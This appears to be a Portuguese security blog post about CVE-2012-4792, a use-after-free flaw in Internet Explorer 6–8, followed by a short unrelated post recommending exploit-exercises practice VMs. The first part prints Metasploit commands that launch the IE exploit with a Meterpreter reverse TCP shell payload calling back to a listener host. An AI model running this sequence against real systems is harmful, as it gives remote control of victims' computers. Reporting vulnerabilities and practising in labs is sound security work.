Execução de código arbitrário no Microsoft Internet Explorer 6, 7 e 8

Há poucos dias veio à tona, novamente, o Microsoft Internet Explorer, que por sinal temos mais de se acostumar…

A razão é que a Microsoft confirmou que uma vulnerabilidade 0-day afeta o Internet Explorer 6, 7 e 8 (versões 9 e 10 não são afetados).

O problema, a que atribuiu o CVE-2012-4792, é que acessar um objeto na memória que tenha sido removido ou que tenha sido atribuída incorretamente (user-after-free), que permite a execução de código arbitrário com os privilégios do usuário. Esta vulnerabilidade também pode permitir a elevação de privilégio e compromisso de todo o sistema.

Ataques foram detectados exploram essa vulnerabilidade, como a web http://www.cfr.org/ cometido esta semana e, até agora, a Microsoft só oferece uma solução rápida (“Fix it”) para o publicação das atualizações de patches correspondentes newsletter: http://support.microsoft.com/kb/2794220.

Também publicado um exploit no âmbito Metasploit. Acompanha os comandos e um exemplo de gráfico de sua implementação:

use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Máquinas virtuais preparadas para exploração de vulnerabilidades.

Acabei encontrando este interessante site, o exploit-exercises, que trás uma série de máquinas virtuais preparadas para o pessoal colocar em prática os seus conhecimentos de exploração de vulnerabilidades.

Inicialmente foram criados 3 tipos de ambientes para serem explorados, são eles:

O download destes ambientes poderá ser feito a partir do seguinte link e vejam que há níveis, iguais aos dos jogos que estamos acostumados, quanto maior o nível, mais difícil é a solução.

Excelente iniciativa e oportunidade de aprendizado.